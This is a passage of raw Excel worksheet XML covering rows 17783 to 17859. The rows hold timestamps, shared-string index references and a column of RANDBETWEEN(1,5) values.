      <c r="F17783">
        <f t="shared" ca="1" si="277"/>
        <v>1</v>
      </c>
    </row>
    <row r="17784" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A17784" s="1">
        <v>43175.14334490741</v>
      </c>
      <c r="C17784" t="s">
        <v>708</v>
      </c>
      <c r="D17784" t="s">
        <v>36</v>
      </c>
      <c r="E17784" s="2" t="s">
        <v>15924</v>
      </c>
      <c r="F17784">
        <f t="shared" ca="1" si="277"/>
        <v>2</v>
      </c>
    </row>
    <row r="17785" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A17785" s="1">
        <v>43175.118877314817</v>
      </c>
      <c r="C17785" t="s">
        <v>410</v>
      </c>
      <c r="E17785" s="2" t="s">
        <v>15993</v>
      </c>
      <c r="F17785">
        <f t="shared" ca="1" si="277"/>
        <v>5</v>
      </c>
    </row>
    <row r="17786" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A17786" s="1">
        <v>43175.108344907407</v>
      </c>
      <c r="C17786" t="s">
        <v>749</v>
      </c>
      <c r="D17786" t="s">
        <v>14</v>
      </c>
      <c r="E17786" s="2" t="s">
        <v>15994</v>
      </c>
      <c r="F17786">
        <f t="shared" ca="1" si="277"/>
        <v>3</v>
      </c>
    </row>
    <row r="17787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17787" s="1">
        <v>43175.102696759262</v>
      </c>
      <c r="C17787" t="s">
        <v>10</v>
      </c>
      <c r="D17787" t="s">
        <v>263</v>
      </c>
      <c r="E17787" t="s">
        <v>15995</v>
      </c>
      <c r="F17787">
        <f t="shared" ca="1" si="277"/>
        <v>5</v>
      </c>
    </row>
    <row r="17788" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17788" s="1">
        <v>43174.959456018521</v>
      </c>
      <c r="C17788" t="s">
        <v>71</v>
      </c>
      <c r="D17788" t="s">
        <v>1036</v>
      </c>
      <c r="E17788" s="2" t="s">
        <v>15996</v>
      </c>
      <c r="F17788">
        <f t="shared" ca="1" si="277"/>
        <v>3</v>
      </c>
    </row>
    <row r="17789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17789" s="1">
        <v>43174.956087962964</v>
      </c>
      <c r="C17789" t="s">
        <v>10</v>
      </c>
      <c r="D17789" t="s">
        <v>36</v>
      </c>
      <c r="E17789" t="s">
        <v>15997</v>
      </c>
      <c r="F17789">
        <f t="shared" ca="1" si="277"/>
        <v>1</v>
      </c>
    </row>
    <row r="17790" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17790" s="1">
        <v>43174.932696759257</v>
      </c>
      <c r="C17790" t="s">
        <v>10</v>
      </c>
      <c r="D17790" t="s">
        <v>114</v>
      </c>
      <c r="E17790" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17790">
        <f t="shared" ca="1" si="277"/>
        <v>1</v>
      </c>
    </row>
    <row r="17791" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17791" s="1">
        <v>43174.932685185187</v>
      </c>
      <c r="C17791" t="s">
        <v>10</v>
      </c>
      <c r="D17791" t="s">
        <v>114</v>
      </c>
      <c r="E17791" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17791">
        <f t="shared" ca="1" si="277"/>
        <v>5</v>
      </c>
    </row>
    <row r="17792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17792" s="1">
        <v>43174.915856481479</v>
      </c>
      <c r="C17792" t="s">
        <v>319</v>
      </c>
      <c r="D17792" t="s">
        <v>15998</v>
      </c>
      <c r="F17792">
        <f t="shared" ca="1" si="277"/>
        <v>3</v>
      </c>
    </row>
    <row r="17793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17793" s="1">
        <v>43174.880624999998</v>
      </c>
      <c r="C17793" t="s">
        <v>10</v>
      </c>
      <c r="D17793" t="s">
        <v>89</v>
      </c>
      <c r="F17793">
        <f t="shared" ca="1" si="277"/>
        <v>4</v>
      </c>
    </row>
    <row r="17794" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17794" s="1">
        <v>43174.868946759256</v>
      </c>
      <c r="C17794" t="s">
        <v>9636</v>
      </c>
      <c r="D17794" t="s">
        <v>86</v>
      </c>
      <c r="E17794" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17794">
        <f t="shared" ref="F17794:F17857" ca="1" si="278">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="17795" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17795" s="1">
        <v>43174.868923611109</v>
      </c>
      <c r="C17795" t="s">
        <v>9636</v>
      </c>
      <c r="D17795" t="s">
        <v>86</v>
      </c>
      <c r="E17795" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17795">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17796" s="1">
        <v>43174.836168981485</v>
      </c>
      <c r="C17796" t="s">
        <v>10</v>
      </c>
      <c r="D17796" t="s">
        <v>6</v>
      </c>
      <c r="E17796" t="s">
        <v>15999</v>
      </c>
      <c r="F17796">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17797" s="1">
        <v>43174.835995370369</v>
      </c>
      <c r="C17797" t="s">
        <v>10</v>
      </c>
      <c r="D17797" t="s">
        <v>6</v>
      </c>
      <c r="E17797" t="s">
        <v>16000</v>
      </c>
      <c r="F17797">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17798" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17798" s="1">
        <v>43174.806828703702</v>
      </c>
      <c r="C17798" t="s">
        <v>50</v>
      </c>
      <c r="D17798" t="s">
        <v>263</v>
      </c>
      <c r="E17798" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17798">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17799" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17799" s="1">
        <v>43174.806817129633</v>
      </c>
      <c r="C17799" t="s">
        <v>50</v>
      </c>
      <c r="D17799" t="s">
        <v>263</v>
      </c>
      <c r="E17799" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17799">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17800" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17800" s="1">
        <v>43174.77915509259</v>
      </c>
      <c r="C17800" t="s">
        <v>71</v>
      </c>
      <c r="D17800" t="s">
        <v>114</v>
      </c>
      <c r="E17800" s="2" t="s">
        <v>15927</v>
      </c>
      <c r="F17800">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17801" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17801" s="1">
        <v>43174.777175925927</v>
      </c>
      <c r="C17801" t="s">
        <v>173</v>
      </c>
      <c r="D17801" t="s">
        <v>92</v>
      </c>
      <c r="E17801" s="2" t="s">
        <v>16001</v>
      </c>
      <c r="F17801">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17802" s="1">
        <v>43174.763078703705</v>
      </c>
      <c r="C17802" t="s">
        <v>535</v>
      </c>
      <c r="D17802" t="s">
        <v>11</v>
      </c>
      <c r="E17802" t="s">
        <v>16002</v>
      </c>
      <c r="F17802">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17803" s="1">
        <v>43174.757604166669</v>
      </c>
      <c r="C17803" t="s">
        <v>10</v>
      </c>
      <c r="D17803" t="s">
        <v>52</v>
      </c>
      <c r="E17803" t="s">
        <v>16003</v>
      </c>
      <c r="F17803">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17804" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17804" s="1">
        <v>43174.744479166664</v>
      </c>
      <c r="C17804" t="s">
        <v>731</v>
      </c>
      <c r="D17804" t="s">
        <v>667</v>
      </c>
      <c r="E17804" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17804">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17805" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17805" s="1">
        <v>43174.744444444441</v>
      </c>
      <c r="C17805" t="s">
        <v>731</v>
      </c>
      <c r="D17805" t="s">
        <v>667</v>
      </c>
      <c r="E17805" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17805">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17806" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17806" s="1">
        <v>43174.73228009259</v>
      </c>
      <c r="C17806" t="s">
        <v>1080</v>
      </c>
      <c r="D17806" t="s">
        <v>124</v>
      </c>
      <c r="E17806" s="2" t="s">
        <v>16004</v>
      </c>
      <c r="F17806">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17807" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17807" s="1">
        <v>43174.722754629627</v>
      </c>
      <c r="C17807" t="s">
        <v>41</v>
      </c>
      <c r="E17807" s="2" t="s">
        <v>16005</v>
      </c>
      <c r="F17807">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17808" s="1">
        <v>43174.702245370368</v>
      </c>
      <c r="C17808" t="s">
        <v>10</v>
      </c>
      <c r="D17808" t="s">
        <v>17</v>
      </c>
      <c r="E17808" t="s">
        <v>16006</v>
      </c>
      <c r="F17808">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17809" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17809" s="1">
        <v>43174.690370370372</v>
      </c>
      <c r="C17809" t="s">
        <v>45</v>
      </c>
      <c r="D17809" t="s">
        <v>480</v>
      </c>
      <c r="E17809" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17809">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17810" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17810" s="1">
        <v>43174.690347222226</v>
      </c>
      <c r="C17810" t="s">
        <v>45</v>
      </c>
      <c r="D17810" t="s">
        <v>480</v>
      </c>
      <c r="E17810" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17810">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17811" s="1">
        <v>43174.650787037041</v>
      </c>
      <c r="C17811" t="s">
        <v>10</v>
      </c>
      <c r="D17811" t="s">
        <v>92</v>
      </c>
      <c r="E17811" t="s">
        <v>16007</v>
      </c>
      <c r="F17811">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17812" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17812" s="1">
        <v>43174.648831018516</v>
      </c>
      <c r="C17812" t="s">
        <v>107</v>
      </c>
      <c r="D17812" t="s">
        <v>89</v>
      </c>
      <c r="E17812" s="2" t="s">
        <v>16008</v>
      </c>
      <c r="F17812">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17813" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17813" s="1">
        <v>43174.635555555556</v>
      </c>
      <c r="C17813" t="s">
        <v>1064</v>
      </c>
      <c r="D17813" t="s">
        <v>52</v>
      </c>
      <c r="E17813" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17813">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17814" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17814" s="1">
        <v>43174.63553240741</v>
      </c>
      <c r="C17814" t="s">
        <v>1064</v>
      </c>
      <c r="D17814" t="s">
        <v>52</v>
      </c>
      <c r="E17814" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17814">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17815" s="1">
        <v>43174.63486111111</v>
      </c>
      <c r="C17815" t="s">
        <v>48</v>
      </c>
      <c r="E17815" t="s">
        <v>16009</v>
      </c>
      <c r="F17815">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17816" s="1">
        <v>43174.622789351852</v>
      </c>
      <c r="C17816" t="s">
        <v>10</v>
      </c>
      <c r="D17816" t="s">
        <v>46</v>
      </c>
      <c r="E17816" t="s">
        <v>16010</v>
      </c>
      <c r="F17816">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17817" s="1">
        <v>43174.610590277778</v>
      </c>
      <c r="C17817" t="s">
        <v>10</v>
      </c>
      <c r="D17817" t="s">
        <v>17</v>
      </c>
      <c r="E17817" t="s">
        <v>16011</v>
      </c>
      <c r="F17817">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17818" s="1">
        <v>43174.596458333333</v>
      </c>
      <c r="C17818" t="s">
        <v>10</v>
      </c>
      <c r="D17818" t="s">
        <v>17</v>
      </c>
      <c r="E17818" t="s">
        <v>16012</v>
      </c>
      <c r="F17818">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17819" s="1">
        <v>43174.594965277778</v>
      </c>
      <c r="C17819" t="s">
        <v>10</v>
      </c>
      <c r="D17819" t="s">
        <v>89</v>
      </c>
      <c r="E17819" t="s">
        <v>16013</v>
      </c>
      <c r="F17819">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17820" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17820" s="1">
        <v>43174.591365740744</v>
      </c>
      <c r="C17820" t="s">
        <v>50</v>
      </c>
      <c r="E17820" s="2" t="s">
        <v>16014</v>
      </c>
      <c r="F17820">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17821" s="1">
        <v>43174.590775462966</v>
      </c>
      <c r="C17821" t="s">
        <v>10</v>
      </c>
      <c r="D17821" t="s">
        <v>330</v>
      </c>
      <c r="E17821" t="s">
        <v>16015</v>
      </c>
      <c r="F17821">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17822" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A17822" s="1">
        <v>43174.570092592592</v>
      </c>
      <c r="C17822" t="s">
        <v>10</v>
      </c>
      <c r="D17822" t="s">
        <v>17</v>
      </c>
      <c r="E17822" s="2" t="s">
        <v>16016</v>
      </c>
      <c r="F17822">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17823" s="1">
        <v>43174.566504629627</v>
      </c>
      <c r="C17823" t="s">
        <v>10</v>
      </c>
      <c r="D17823" t="s">
        <v>41</v>
      </c>
      <c r="E17823" t="s">
        <v>16017</v>
      </c>
      <c r="F17823">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17824" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A17824" s="1">
        <v>43174.560682870368</v>
      </c>
      <c r="C17824" t="s">
        <v>71</v>
      </c>
      <c r="E17824" s="2" t="s">
        <v>16018</v>
      </c>
      <c r="F17824">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17825" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17825" s="1">
        <v>43174.55914351852</v>
      </c>
      <c r="C17825" t="s">
        <v>2428</v>
      </c>
      <c r="D17825" t="s">
        <v>192</v>
      </c>
      <c r="E17825" s="2" t="s">
        <v>16019</v>
      </c>
      <c r="F17825">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17826" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17826" s="1">
        <v>43174.549942129626</v>
      </c>
      <c r="C17826" t="s">
        <v>2156</v>
      </c>
      <c r="D17826" t="s">
        <v>67</v>
      </c>
      <c r="E17826" s="2" t="s">
        <v>16020</v>
      </c>
      <c r="F17826">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17827" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17827" s="1">
        <v>43174.529398148145</v>
      </c>
      <c r="C17827" t="s">
        <v>776</v>
      </c>
      <c r="D17827" t="s">
        <v>229</v>
      </c>
      <c r="E17827" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17827">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17828" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17828" s="1">
        <v>43174.529317129629</v>
      </c>
      <c r="C17828" t="s">
        <v>776</v>
      </c>
      <c r="D17828" t="s">
        <v>229</v>
      </c>
      <c r="E17828" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17828">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17829" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A17829" s="1">
        <v>43174.507210648146</v>
      </c>
      <c r="C17829" t="s">
        <v>82</v>
      </c>
      <c r="D17829" t="s">
        <v>885</v>
      </c>
      <c r="E17829" s="2" t="s">
        <v>16021</v>
      </c>
      <c r="F17829">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17830" s="1">
        <v>43174.502025462964</v>
      </c>
      <c r="C17830" t="s">
        <v>10</v>
      </c>
      <c r="D17830" t="s">
        <v>23</v>
      </c>
      <c r="E17830" t="s">
        <v>16022</v>
      </c>
      <c r="F17830">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17831" s="1">
        <v>43174.500162037039</v>
      </c>
      <c r="C17831" t="s">
        <v>10</v>
      </c>
      <c r="D17831" t="s">
        <v>11</v>
      </c>
      <c r="E17831" t="s">
        <v>16023</v>
      </c>
      <c r="F17831">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17832" s="1">
        <v>43174.491076388891</v>
      </c>
      <c r="C17832" t="s">
        <v>10</v>
      </c>
      <c r="D17832" t="s">
        <v>667</v>
      </c>
      <c r="E17832" t="s">
        <v>16024</v>
      </c>
      <c r="F17832">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17833" s="1">
        <v>43174.489953703705</v>
      </c>
      <c r="C17833" t="s">
        <v>10</v>
      </c>
      <c r="D17833" t="s">
        <v>158</v>
      </c>
      <c r="E17833" t="s">
        <v>16025</v>
      </c>
      <c r="F17833">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17834" s="1">
        <v>43174.482210648152</v>
      </c>
      <c r="C17834" t="s">
        <v>10</v>
      </c>
      <c r="D17834" t="s">
        <v>158</v>
      </c>
      <c r="E17834" t="s">
        <v>16026</v>
      </c>
      <c r="F17834">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17835" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17835" s="1">
        <v>43174.465474537035</v>
      </c>
      <c r="C17835" t="s">
        <v>6230</v>
      </c>
      <c r="E17835" s="2" t="s">
        <v>16027</v>
      </c>
      <c r="F17835">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17836" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17836" s="1">
        <v>43174.44425925926</v>
      </c>
      <c r="C17836" t="s">
        <v>10</v>
      </c>
      <c r="D17836" t="s">
        <v>20</v>
      </c>
      <c r="E17836" s="2" t="s">
        <v>16028</v>
      </c>
      <c r="F17836">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17837" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A17837" s="1">
        <v>43174.436597222222</v>
      </c>
      <c r="C17837" t="s">
        <v>319</v>
      </c>
      <c r="D17837" t="s">
        <v>320</v>
      </c>
      <c r="E17837" s="2" t="s">
        <v>16029</v>
      </c>
      <c r="F17837">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17838" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17838" s="1">
        <v>43174.428032407406</v>
      </c>
      <c r="C17838" t="s">
        <v>1080</v>
      </c>
      <c r="E17838" s="2" t="s">
        <v>16030</v>
      </c>
      <c r="F17838">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17839" s="1">
        <v>43174.420798611114</v>
      </c>
      <c r="C17839" t="s">
        <v>10</v>
      </c>
      <c r="D17839" t="s">
        <v>52</v>
      </c>
      <c r="E17839" t="s">
        <v>16031</v>
      </c>
      <c r="F17839">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17840" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17840" s="1">
        <v>43174.416956018518</v>
      </c>
      <c r="C17840" t="s">
        <v>65</v>
      </c>
      <c r="E17840" s="2" t="s">
        <v>16032</v>
      </c>
      <c r="F17840">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17841" s="1">
        <v>43174.406678240739</v>
      </c>
      <c r="C17841" t="s">
        <v>776</v>
      </c>
      <c r="E17841" t="s">
        <v>16033</v>
      </c>
      <c r="F17841">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17842" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17842" s="1">
        <v>43174.393252314818</v>
      </c>
      <c r="C17842" t="s">
        <v>3994</v>
      </c>
      <c r="D17842" t="s">
        <v>20</v>
      </c>
      <c r="E17842" s="2" t="s">
        <v>16034</v>
      </c>
      <c r="F17842">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17843" s="1">
        <v>43174.366678240738</v>
      </c>
      <c r="C17843" t="s">
        <v>71</v>
      </c>
      <c r="E17843" t="s">
        <v>16035</v>
      </c>
      <c r="F17843">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17844" s="1">
        <v>43174.361331018517</v>
      </c>
      <c r="C17844" t="s">
        <v>6</v>
      </c>
      <c r="D17844" t="s">
        <v>194</v>
      </c>
      <c r="E17844" t="s">
        <v>16036</v>
      </c>
      <c r="F17844">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17845" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A17845" s="1">
        <v>43174.360937500001</v>
      </c>
      <c r="C17845" t="s">
        <v>102</v>
      </c>
      <c r="D17845" t="s">
        <v>80</v>
      </c>
      <c r="E17845" s="2" t="s">
        <v>16037</v>
      </c>
      <c r="F17845">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17846" s="1">
        <v>43174.358518518522</v>
      </c>
      <c r="C17846" t="s">
        <v>6</v>
      </c>
      <c r="D17846" t="s">
        <v>194</v>
      </c>
      <c r="E17846" t="s">
        <v>16038</v>
      </c>
      <c r="F17846">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17847" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A17847" s="1">
        <v>43174.355150462965</v>
      </c>
      <c r="C17847" t="s">
        <v>41</v>
      </c>
      <c r="E17847" s="2" t="s">
        <v>16039</v>
      </c>
      <c r="F17847">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17848" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A17848" s="1">
        <v>43174.354571759257</v>
      </c>
      <c r="C17848" t="s">
        <v>10</v>
      </c>
      <c r="D17848" t="s">
        <v>36</v>
      </c>
      <c r="E17848" s="2" t="s">
        <v>8558</v>
      </c>
      <c r="F17848">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17849" s="1">
        <v>43174.341574074075</v>
      </c>
      <c r="C17849" t="s">
        <v>48</v>
      </c>
      <c r="E17849" t="s">
        <v>16040</v>
      </c>
      <c r="F17849">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17850" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17850" s="1">
        <v>43174.320300925923</v>
      </c>
      <c r="C17850" t="s">
        <v>3994</v>
      </c>
      <c r="D17850" t="s">
        <v>817</v>
      </c>
      <c r="E17850" s="2" t="s">
        <v>16041</v>
      </c>
      <c r="F17850">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17851" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17851" s="1">
        <v>43174.319953703707</v>
      </c>
      <c r="C17851" t="s">
        <v>10</v>
      </c>
      <c r="D17851" t="s">
        <v>721</v>
      </c>
      <c r="E17851" s="2" t="s">
        <v>16042</v>
      </c>
      <c r="F17851">
        <f t="shared" ca="1" si="278"/>
        <v>1</v>
      </c>
    </row>
    <row r="17852" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17852" s="1">
        <v>43174.311620370368</v>
      </c>
      <c r="C17852" t="s">
        <v>71</v>
      </c>
      <c r="E17852" s="2" t="s">
        <v>16043</v>
      </c>
      <c r="F17852">
        <f t="shared" ca="1" si="278"/>
        <v>5</v>
      </c>
    </row>
    <row r="17853" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17853" s="1">
        <v>43174.301516203705</v>
      </c>
      <c r="C17853" t="s">
        <v>48</v>
      </c>
      <c r="E17853" s="2" t="s">
        <v>16044</v>
      </c>
      <c r="F17853">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17854" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17854" s="1">
        <v>43174.300543981481</v>
      </c>
      <c r="C17854" t="s">
        <v>7636</v>
      </c>
      <c r="D17854" t="s">
        <v>80</v>
      </c>
      <c r="E17854" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17854">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17855" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17855" s="1">
        <v>43174.300520833334</v>
      </c>
      <c r="C17855" t="s">
        <v>7636</v>
      </c>
      <c r="D17855" t="s">
        <v>80</v>
      </c>
      <c r="E17855" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F17855">
        <f t="shared" ca="1" si="278"/>
        <v>4</v>
      </c>
    </row>
    <row r="17856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17856" s="1">
        <v>43174.266342592593</v>
      </c>
      <c r="C17856" t="s">
        <v>559</v>
      </c>
      <c r="E17856" t="s">
        <v>16045</v>
      </c>
      <c r="F17856">
        <f t="shared" ca="1" si="278"/>
        <v>3</v>
      </c>
    </row>
    <row r="17857" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17857" s="1">
        <v>43174.245057870372</v>
      </c>
      <c r="C17857" t="s">
        <v>4879</v>
      </c>
      <c r="D17857" t="s">
        <v>124</v>
      </c>
      <c r="E17857" s="2" t="s">
        <v>16046</v>
      </c>
      <c r="F17857">
        <f t="shared" ca="1" si="278"/>
        <v>2</v>
      </c>
    </row>
    <row r="17858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17858" s="1">
        <v>43174.205046296294</v>
      </c>
      <c r="C17858" t="s">
        <v>41</v>
      </c>
      <c r="E17858" t="s">
        <v>16047</v>
      </c>
      <c r="F17858">
        <f t="shared" ref="F17858:F17921" ca="1" si="279">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="17859" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A17859" s="1">
